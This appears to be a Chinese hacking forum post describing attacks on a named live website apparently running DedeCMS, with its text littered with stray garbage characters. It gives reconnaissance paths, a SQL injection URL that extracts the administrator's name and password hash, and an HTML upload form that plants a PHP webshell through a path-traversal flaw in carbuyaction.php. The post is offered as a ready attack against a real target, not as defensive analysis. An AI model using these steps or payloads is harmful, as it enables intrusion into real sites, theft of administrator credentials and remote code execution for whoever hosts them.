①注入漏洞。- S" @$ g( P6 X/ c& p, H C, o
这站 http://www.political-security.com/3 V/ S F2 k9 O
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
5 v/ ~/ x9 J2 t4 _% _( P! ?www.political-security.com/data/mysql_error_trace.inc 爆后台
. C6 V# }7 S( s- C/ C# K5 [然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
6 q5 q; n# i( C然后写上语句 4 h& y$ b/ c5 O$ u
查看管理员帐号* P0 C( e$ P9 w+ j$ h. `
http://www.political-security.co ... &membergroup=@`
4 S/ \+ y- x. V! i& D6 R+ Y
, c' w: f8 y1 C. J7 r* H+ C$ ~, Eadmin / z' v$ m- {; t2 L8 m
+ x0 | X- ~- N. N$ o A查看管理员密码
& Q/ m) C% S1 r7 T http://www.political-security.co ... &membergroup=@`
" S- ]+ f6 p. j; L6 I) f# x
8 r2 `2 ^1 i( T& b8d29b1ef9f8c5a5af429
, p( e4 q+ Z+ j7 d# c, g8 C& ~ V' H$ l( \: I
查看管理员密码+ a" j% s6 F& y3 A4 _# t
* y" N: f4 ^3 q) G. t得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5 {; b( d8 [6 L% [: N( z, y* Y
/ e: n* o6 v9 {8 T
8d2
6 Q; V" o4 b7 K, Y, o9b1ef9f8c5a5af42, T9 a1 L3 n y X F4 M/ f& d- n5 _
9
3 c3 v" B4 j4 L/ K- p$ B3 V1 h- f8 g ]6 x
cmd5没解出来 只好测试第二个方法
5 @/ T [8 ?7 M! P( d4 N, @1 r6 O, h1 H
9 ~2 R$ q! }3 k M
6 I4 r4 M+ s; s: T, d' ]/ n②上传漏洞:% q+ ?1 R1 S( |/ y) [3 S
1 d$ s4 M' ]% m; d8 z6 D
只要登陆会员中心,然后访问页面链接6 }& `+ K" |9 c
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
7 v( V5 K7 x" L; o0 I9 L! W0 ~* u$ Y$ c" b" ?: E8 [
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
+ r# M6 M- T7 K% c3 Z" {' O, O; i( I: V4 v
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
N+ ^2 G( M a8 t# N& d
/ d U8 k! p" S& h1 k0 b9 |0 }1 |<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
1 m$ X4 L3 P- p% X% Z, l p或者5 q4 P, {* g7 q: N
即可上传成功 |